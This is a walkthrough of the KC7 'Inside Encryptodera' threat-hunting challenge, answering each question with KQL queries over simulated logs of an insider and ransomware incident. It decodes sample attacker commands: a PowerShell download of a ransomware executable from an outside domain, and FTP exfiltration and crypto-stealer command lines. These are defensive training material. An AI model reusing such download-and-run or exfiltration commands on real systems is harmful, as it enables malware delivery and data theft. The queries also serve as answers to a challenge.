Inside Encryptodera

Before Reading

This writeup doesn't contain detailed explanation of everything and assumes you're already familiar with KQL. My assumption is that you completed Balloons Over Iowa module, also answer queries are very self-explanatory. If you are looking for beginner friendly detailed writeup look into the post by Shinigami42: KC7: Reflections on “Encryptodera” and Using It to Create a Professional Portfolio

Challenge: Inside Encryptodera

0: KQL 101

Skipped

1: Offensive Odor

Question 1: What is Barry's role at the company?

Employees
| where name == 'Barry Shmelly'
| project role

Question 2: What is Barry's email address?

Employees
| where name == 'Barry Shmelly'
| project email_addr

Question 3: What was the subject of the interesting email (the one on January 16th) that Barry sent?

Email
| where sender == 'barry_shmelly@encryptoderafinancial.com'
| where monthofyear(timestamp) == 1
| where dayofmonth(timestamp) == 16
| project subject

Question 4: What was the role of the employees that received Barry's email?

let mailsSentTo = Email
| where sender == 'barry_shmelly@encryptoderafinancial.com'
| where subject == "I'm not coming in today. I'm sick of this place. We're all getting laid off anyway."
| project recipient;
Employees
| where email_addr in (mailsSentTo)
| distinct role;

Question 5: What was the role of the recipient of that email?

let email = Email
| where monthofyear(timestamp) == 1
| where dayofmonth(timestamp) == 18
| where subject == 'YOU ARE A GREEDY PIG!!!! WHAT IS WRONG WITH YOU?????'
| project recipient;
Employees
| where email_addr in (email)
| project role;

Question 6: What's Barry's IP address? (Paste the full IP address )

Employees
| where name == 'Barry Shmelly'
| project ip_addr

Question 7: What was the complete URL that Barry was browsing on his computer regarding Cybersecurity Insiders on the afternoon of December 26th?(Paste the full url)

OutboundNetworkEvents
| where src_ip == '10.10.0.1'
| where monthofyear(timestamp) == 12
| where dayofmonth(timestamp) == 26
| where url has 'insiders'

Question 8: What website did he visit first on January 15th? (Paste the full URL)

OutboundNetworkEvents
| where src_ip == '10.10.0.1'
| where monthofyear(timestamp) == 1
| where dayofmonth(timestamp) == 15 
| where url has 'exe'

Question 9: Could you provide the full URL for the website Barry searched for USB Flash Drives?

OutboundNetworkEvents
| where src_ip == '10.10.0.1'
| where url has 'usb'

Question 10: What "secret" document on business transactions did Barry download?

InboundNetworkEvents
| where src_ip == '10.10.0.1'
| where url has 'secret'
| project parse_path(url).Filename

Question 11: What document (docx) did Barry download about salaries?

InboundNetworkEvents
| where src_ip == '10.10.0.1'
| project filename = parse_path(url).Filename
| where filename has 'docx'

Question 12: What document (zip) did Barry download to get this?

InboundNetworkEvents
| where src_ip == '10.10.0.1'
| project filename = parse_path(url).Filename
| where filename has 'zip'

Question 13: Do you know the password he used to zip the files?

➜ 7z.exe --help

7-Zip 22.01 (x64) : Copyright (c) 1999-2022 Igor Pavlov : 2022-07-15

Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]

<Commands>
    [...]

<Switches>
    [...]
    -p{Password} : set Password
    [...]

ProcessEvents
| where hostname == 'IGOY-DESKTOP'
| where process_commandline has '7z.exe'
| project process_commandline

Question 14: What is the name of the drive on which Barry stored the final files?

ProcessEvents
| where hostname == 'IGOY-DESKTOP'
| where timestamp > datetime('2024-01-16T11:00:41Z')
| project process_commandline

Get events after 7z.exe was ran to see activity after.

Question 15: Type gotheem to take credit

Title, lol

2: Crypto Conquest

Question 1: What is the filename of this note?

From the image: YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt

Question 2: What kind of attack is this?

Ransomware is a type of malware attack in which the attacker locks and encrypts the victim’s data, important files and then demands a payment to unlock and decrypt the data.

Question 3: On how many machines was this .txt file seen?

FileCreationEvents
| where filename == 'YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt'
| distinct hostname
| count 

Question 4: What time was the ransom note first seen?

FileCreationEvents
| where filename == 'YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt'
| project timestamp
// | order by timestamp asc // Already Sorted
| take 1

Question 5: What is the hostname of the system where the ransom note was first seen?

FileCreationEvents
| where filename == 'YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt'
| project hostname
| take 1

Question 6: How many files were encrypted on this machine?

First manually enumerate for anomalies in filenames and then narrow down:

FileCreationEvents
| where hostname == 'UL8R-MACHINE'

FileCreationEvents
| where hostname == 'UL8R-MACHINE'
| where filename has '.umadbro'
| count 

Question 7: What is the extension that was used on the encrypted files?

We learned it from previous answer, Question 6.

Question 8: What command was run that references the ransomware extension?

ProcessEvents
| where hostname == 'UL8R-MACHINE'
| where process_commandline has 'umadbro'
| project process_commandline

Question 9: When did files_go_byebye.exe appear on this machine?

FileCreationEvents
| where hostname == 'UL8R-MACHINE'
| where filename == 'files_go_byebye.exe'
| project timestamp

Question 10: How many commands were run on UL8R-MACHINE during this timeframe?

Query given:

ProcessEvents
| where hostname == "UL8R-MACHINE"
| where timestamp between (datetime("2024-02-16") .. datetime("2024-02-18"))

Answer:

ProcessEvents
| where hostname == "UL8R-MACHINE"
| where timestamp between (datetime("2024-02-16") .. datetime("2024-02-18"))
| count 

Question 11: What domain does the encoded PowerShell reference?

ProcessEvents
| where hostname == "UL8R-MACHINE"
| where timestamp between (datetime("2024-02-16") .. datetime("2024-02-18"))
| where process_name == 'powershell.exe'
| project process_commandline

└─$ echo -n 'cG93ZXJzaGVsbCAtYyAiSW52b2tlLVdlYlJlcXVlc3QgLVVyaSBodHRwOi8vbm90aWZpY2F0aW9uLWZpbmFuY2Utc2VydmljZXMuY29tL2ZpbGVzX2dvX2J5ZWJ5ZS5leGUgLU91dEZpbGUgQzpcXFByb2dyYW1EYXRhXFxmaWxlc19nb19ieWVieWUuZXhlIg==' | base64 -d
powershell -c "Invoke-WebRequest -Uri http://notification-finance-services.com/files_go_byebye.exe -OutFile C:\\ProgramData\\files_go_byebye.exe"                                                                       

Question 12: What command is run right before the base64-encoded PowerShell?

Narrow down search with process_hash of malicious pwsh command and rows_near for ease of finding nearby rows.

ProcessEvents
| where hostname == "UL8R-MACHINE"
| serialize 
| evaluate rows_near(process_hash == '6716595f0a4eeea7c0b4a34312356494c65653cfe6b4776d078bd599ca328842', 1, 0) 

Question 13: How many devices ran the gpupdate /force command?

gpupdate: Updates Group Policy settings.

ProcessEvents
| where process_commandline == 'gpupdate /force'
| distinct hostname
| count 

Question 14: How many machines at Encryptodera ran "systeminfo"?

ProcessEvents
| where process_commandline == 'systeminfo'
| distinct hostname
| count 

Question 15: What was the timestamp for the first time the command was run?

ProcessEvents
| where process_commandline == 'systeminfo'
| project timestamp
| take 1

Question 16: How many days elapsed between when the attackers ran discovery commands and when the ransomware attack started?

First we need timestamps of when first enumeration and first exploitation happened, we can get them easily because we already encountered the commands to permform said actions.

datetime_diff function can be used to calculate the delta between timestamps. toscalar function is used to convert dynamic type to scalar AKA single value. print operator can be used to show the output.

let enumeartion = ProcessEvents
| where process_commandline == 'systeminfo'
| project timestamp
| take 1;
let exploitation = ProcessEvents
| where process_commandline == 'gpupdate /force'
| project timestamp
| take 1;
print diffs = datetime_diff('Day', toscalar(exploitation), toscalar(enumeartion))

Question 17: What is the hostname of the device where the attackers first ran systeminfo?

Modify query from Question 15.

ProcessEvents
| where process_commandline == 'systeminfo'
| project hostname
| take 1

Question 18: What was the full commandline used by the threat actor when running nltest /dclist?

Given hostname: 41QI-LAPTOP

The nltest /dclist:<DomainName> command is a Windows command-line utility used to display a list of domain controllers in the specified domain. This command is particularly useful for troubleshooting and obtaining information about the domain controllers available in a given Active Directory domain.

• nltest: This is the main command-line utility for managing and troubleshooting aspects of Windows domains.

• /dclist: This parameter is used to specify that the command should retrieve a list of domain controllers.

• <DomainName>: Replace this with the actual name of the domain for which you want to obtain the list of domain controllers.

ProcessEvents
| where hostname == '41QI-LAPTOP'
| where process_commandline has 'nltest /dclist'
| project process_commandline

Question 19: What is the full name of the .xlsx.exe file on 41QI-LAPTOP?

ProcessEvents
| where hostname == '41QI-LAPTOP'
| where process_commandline has '.xlsx.exe'
| project process_commandline

Question 20: What file shows up a few seconds after the .xlsx.exe file? Enter the filename

ProcessEvents
| where hostname == '41QI-LAPTOP'
| where timestamp > datetime(2024-02-01T08:50:22Z)
| project process_commandline
| take 1

2024-02-01T08:50:22Z datetime from Question 19's answer.

Question 21: How many devices does screenconnect_client.exe appear on?

ProcessEvents 
| where process_commandline has 'screenconnect_client.exe'
| distinct hostname
| count

Question 22: Check the Email logs to see if the .xlsx.exe file was sent in a link. What email address was used to send this file?

Email
| where link has '.xlsx.exe'
| distinct sender

Question 23: How many unusual emails were sent by Barry?

1. We need to investigate emails after 2024-02-01 from Barry.

2. As discussed from previous questions attackers hide extension by using double extension. For Windows we are looking for exe.

3. Filter for only double extensions. e.g.: '*.docx.exe'

Email
| where timestamp >= datetime(2024-02-01)
| where link has '.exe'
| where countof(tostring(parse_path(link).Filename), '.') == 2
| count 

Question 24: Type got it once you've made a note of these recipients.

Title, lol

Question 25: What IP was used to sign in to Barry's account on February 1st?

let barryUsername = toscalar(
    Employees
    | where email_addr == 'barry_shmelly@encryptoderafinancial.com'
    | project username
);
AuthenticationEvents
| where monthofyear(timestamp) == 2 // February
| where dayofmonth(timestamp)  == 1 // 1st
| where username == barryUsername;

Question 26: How many other accounts did that IP log into?

AuthenticationEvents
| where src_ip == '143.38.175.105'

Question is about other accounts

Question 27: How many IPs logged in to all 8 devices where the attacker ran systeminfo?

I hate how long this question took me to finally realize what it was asking...

let hosts = ProcessEvents
| where process_commandline has "systeminfo"
| distinct hostname;
AuthenticationEvents
| where hostname in (hosts)
| summarize dcount(hostname) by src_ip
| order by dcount_hostname desc

Question 28: What is the role of the employee who this IP address belongs to?

Given IP: 10.10.0.138

Employees
| where ip_addr == '10.10.0.138'
| project role

Question 29: How many successful logins were made from this IP?

AuthenticationEvents
| where src_ip == '10.10.0.138'
| where result == 'Successful Login'
| count 

Question 30: What is the hostname of the server the attackers logged into?

AuthenticationEvents
| where src_ip == '10.10.0.138'
| where result == 'Successful Login'
| where hostname has 'SERVER'

Question 31: Pay Respects

f

3: F in the chat

Question 1: What username was used to log into the DOMAIN_CONTROLLER_SERVER?

AuthenticationEvents
| where hostname == 'DOMAIN_CONTROLLER_SERVER'
| project username

Question 2: What laptop did the lihenry_domain_admin account sign into? (Enter the hostname)

AuthenticationEvents
| where username == 'lihenry_domain_admin'

Question 3: What is the MITRE ATT&CK ID for Mimikatz?

Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks.

Question 4: Did the threat actor run mimikatz on this device? If so, enter the command line the attacker ran. If not, enter no

ProcessEvents
| where hostname == 'GJ95-LAPTOP'
| where process_commandline has 'mimikatz'

Question 5: Who does this device belong to? (Enter the employee's name)

Employees
| where hostname == 'GJ95-LAPTOP'
| project name

Question 6: Was Valerie Orozco targeted in the phishing emails sent from Barry Shmelly?

let valerieEmail = Employees
| where hostname == 'GJ95-LAPTOP'
| project email_addr;
Email
| where recipient == toscalar(valerieEmail)
| where sender == 'barry_shmelly@encryptoderafinancial.com'
| project subject, link

Question 7: What is the name of the file that was sent to Valerie in the phishing email?

We learned it from Question 6 query.

Question 8: Did Valerie click the link? If so, enter the timestamp when she clicked the link. If not, enter 'no'

let valerieIP = Employees
| where hostname == 'GJ95-LAPTOP'
| project ip_addr;
OutboundNetworkEvents
| where src_ip == toscalar(valerieIP)
| where url has 'Employee_Contact_List_Updated_March_2024.docx.exe'

Question 9: How many different user accounts logged into Valerie's machine?

AuthenticationEvents
| where hostname == 'GJ95-LAPTOP'
| where result == 'Successful Login'
| distinct username

Question 10: How many unique hosts did this user account attempt to log into?

AuthenticationEvents
| where username == 'systadmi_local_admin'
| distinct hostname
| count 

Question 11: Which user NOT in an IT role was improperly using the systadmi_local_admin credentials? (This is likely a sign of compromise)

We are directly given an answer query.

let hosts = FileCreationEvents
| where filename has "screenconnect"
| distinct hostname;
AuthenticationEvents
| where hostname in (hosts)
| where username has "systadmi"
| where result has "Successful"
| join (
    Employees 
    | project ip_addr,role,email_addr,name
) on $left.src_ip==$right.ip_addr
| project SourceIpName=name, a="who is a", SourceIpUserRole=role, b="logged onto",hostname, c="using", username, d="at",timestamp

Question 12: When was Robin phished by Barry Shmelly's account?

let robinEmail = Employees 
| where name == 'Robin Kirby'
| project email_addr;
Email
| where sender == 'barry_shmelly@encryptoderafinancial.com'
| where recipient == toscalar(robinEmail)
| project timestamp

4: A Network Mystery

Question 1: Which IP address received the largest amount of data on Feb 5th?

NetworkFlow
| where monthofyear(timestamp) == 2
| where dayofmonth(timestamp) == 5
| order by bytes desc 
| take 1

Question 2: How many bytes of data were sent to that IP on the 5th?

We got information about this question from Question 2.

Question 3: When was data first sent to this IP? (paste the full timestamp)

NetworkFlow
| where dest_ip == '182.56.23.121' // From Question 1

Question 4: On how many distinct days have we sent data to this IP?

Extract only dates using format_datetime and then count unique values.

NetworkFlow
| where dest_ip == '182.56.23.121'
| distinct format_datetime(timestamp, 'yyyy-MM-dd')
| count 

Question 5: What service is used for the port to which this data is being transferred?

NetworkFlow
| where dest_ip == '182.56.23.121'
| distinct dest_port

List of TCP and UDP port numbers

Question 6: What is the total amount of data transferred to this IP address?

NetworkFlow
| where dest_ip == '182.56.23.121'
| summarize sum(bytes)

Question 7: How many distinct employees have sent data to this IP address?

NetworkFlow
| where dest_ip == '182.56.23.121'
| distinct src_ip

Question 8: Whose name is linked to that IP address? Provide the employee's name.

let susIP = NetworkFlow
| where dest_ip == '182.56.23.121'
| distinct src_ip;
Employees
| where ip_addr == toscalar(susIP)

Question 9: What is that employee's role?

We got information about this question from Question 8.

Question 10: We see her looking for the location of the companys __ __ __ __ (4 words)

InboundNetworkEvents
| where src_ip == '10.10.0.2'
| where url has 'company'
| where url has 'location'
| project url_decode(url)

Crypto Bruh indeed 🤣

Question 11: Who was Jane having a suspicious conversation with? (email address)

Email
| where sender == 'jane_smith@encryptoderafinancial.com'

Privacy101...

Inside-Encryptodera-1

Question 12: What IP address did the boss man provide to help with smuggling the data?

Email
| where recipient == 'jane_smith@encryptoderafinancial.com'
| where sender == 'elboss@westealurcrypto.com'
| project subject

Inside-Encryptodera-2

Bad henchmen... lol

Question 13: What is the name of the data exfil tool Jane downloads to help with her operation?

OutboundNetworkEvents
| where src_ip == '10.10.0.2'
| where url endswith '.exe'

Question 14: What is the name of the crypto theft tool Jane downloads to help with her operation?

We got information about this question from Question 13.

Question 15: To what path does Jane point her data exfiltration tool?

If you filter ProcessEvents table for known filenames you will get no results and that's odd. The rogue employee must have used them somehow and we know it jane (username: jasmith). If you remember Barry he executed encoded payload with powershell, lets look into that.

ProcessEvents
| where  username == 'jasmith'
| where process_commandline has 'powershell.exe'
| project process_commandline

└─$ echo 'Y3J5cHRvX3N0ZWFsZXIuZXhlIC0tZGFpbHkgLS1pbnB1dCBcXFxcTmV0d29ya1NoYXJlXFxjcml0aWNhbF9pbmZyYXN0cnVjdHVyZVxcQ3J5cHRvX1dhbGxldF9TdG9yYWdlX0xvY2F0aW9uc1xcIC0tb3V0cHV0IEM6XFxVc2Vyc1xcamFzbWl0aFxcVG9UaGVNb29uXFw='
| base64 -d
crypto_stealer.exe --daily --input \\\\NetworkShare\\critical_infrastructure\\Crypto_Wallet_Storage_Locations\\ --output C:\\Users\\jasmith\\ToTheMoon\\

Question 16: At what tempo does she set the tool to run? (one word)

We got information about this question from Question 15.

Question 17: What password does Jane use for the tool?

From Question 15 we can observe a different encoded payload being executed.

└─$ echo -n 'KCAnXFxub29NZWhUb1RcXGh0aW1zYWpcXHNyZXNVXFw6QyBodGFwLS0gMTIxLjMyLjY1LjI4MSBwaS0tIDEyIHRyb3AtLSAibW9jLmxhaWNuYW5pZmFyZWRvdHB5cmNuZSIgbWl0Y2l2LS0gNURONEhydUZGMHRpM2s0dGxsM3dPVFlSQ2hjdW0ydG9nVSBzc2FwLS0gaHRpbXNhaiByZXN1LS0geWxpYWQtLSBleGUudG5laWxjX3B0ZicgLXNwbGl0ICcnIHwgJXskX1swXX0pIC1qb2luICcn' | base64 -d
( '\\nooMehToT\\htimsaj\\sresU\\:C htap-- 121.32.65.281 pi-- 12 trop-- "moc.laicnanifaredotpyrcne" mitciv-- 5DN4HruFF0ti3k4tll3wOTYRChcum2togU ssap-- htimsaj resu-- yliad-- exe.tneilc_ptf' -split '' | %{$_[0]}) -join ''                                                                     

└─$ echo -n '...' | base64 -d | rev
'' nioj- )}]0[_${% | '' tilps- 'ftp_client.exe --daily --user jasmith --pass Ugot2muchCRYTOw3llt4k3it0FFurH4ND5 --victim "encryptoderafinancial.com" --port 21 --ip 182.56.23.121 --path C:\\Users\\jasmith\\ToTheMoon\\' (

The powershell code is first encoded in Base64 for first level of obfuscation and then it seems to be reversed, the command assembles command and executes it.